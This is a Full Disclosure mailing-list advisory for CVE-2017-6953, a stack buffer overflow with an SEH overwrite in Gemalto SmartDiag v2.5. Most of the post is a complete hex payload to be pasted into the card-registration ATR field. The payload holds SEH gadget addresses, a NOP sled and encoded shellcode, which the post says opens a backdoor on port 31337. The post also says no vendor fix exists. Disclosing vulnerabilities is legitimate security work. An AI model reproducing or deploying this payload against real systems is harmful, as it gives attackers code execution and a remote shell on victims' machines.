# Exploit Title: Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow - SEH Overwrite - Code Execution # Date: 16-03-2017 # Software Link: http://support.gemalto.com/index.php?id=download_tools # Exploit Author: Majid Alqabandi # Contact: https://www.linkedin.com/in/majidalqabandi/ # CVE: CVE-2017-6953 # Category: Local - command execution - Buffer Overflow - SEH Overwrite. # Vendor Notified: 17-04-2016
1. Description SymDiag.exe is vulnerable to buffer overflow, SEH overwrite. When trying to (Register a new card), Input fields are vulnerable to stack overflow attack which leads to code execution and other possible security threats. 2. Proof of Concept The following PoC is provided code will: - Exploit the vulnerability. - Execute shell code. - Create a backdoor on port 31337. To exploit, start SmartDiag.exe tool, choose "Register a new card", on the ATR use the following payload (Tested on Win7x64 & Win8x64 - SmartDiag v2.5): 52834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340 0052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528 3400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000 5283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000528340005283400052834000572b0410477f40008c214100f494400041ed40003b4140003552011078ab0110010000009cf2021000100000328b031040000000d02203100120400026e6400090909090e2f5001090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090ddc1d97424f4bbc4aa698a5833c9b15683e8fc3158140358d0489c7630055f87c076e962f1a48de7a378c5aa4ff28b5ec47604506d3c725f6ef0ba33ac92464ee0747681f575bffcf524688aa7d81dce7bd8f144c3a2749ab71876cb671630f30c70e102c162dd4d6e50954fa6a8567e8667694e0b79ad69f30cc5898e161 ef3549283531f046065ccd3e369b990ac6d3c74c78ab57b081b8d5f8c4756c1952d39fec68ae65a8c39f3ddcf5530d0efa55e638397c1df0b948af9ccdba1be432249bf4ae11defe4c01d64f5edc82ba541a28b152212647cad4d947f67f892b153a974b06337ec3d85adfe6b1d593d4896fe3eba8a57a9f2c46fd602c3dc7baa8496976fb4a9bdc7bf92569dd151c6a2fb016b3060d1e2293f86a39c36425e86e070a35eca3078a3d5b90d9ff1a9cb20be9d8376684b6221da253c9eb4a1b9ec06b7c538f15777954468b8714111a4e1aec86c11e550c4baa00154a752fc9bded0f46325c87d61614e6e1bfa3b9088fb69AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 3. Solution: Vendor has been informed and confirmed the issue, no fix is available yet from vendor. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
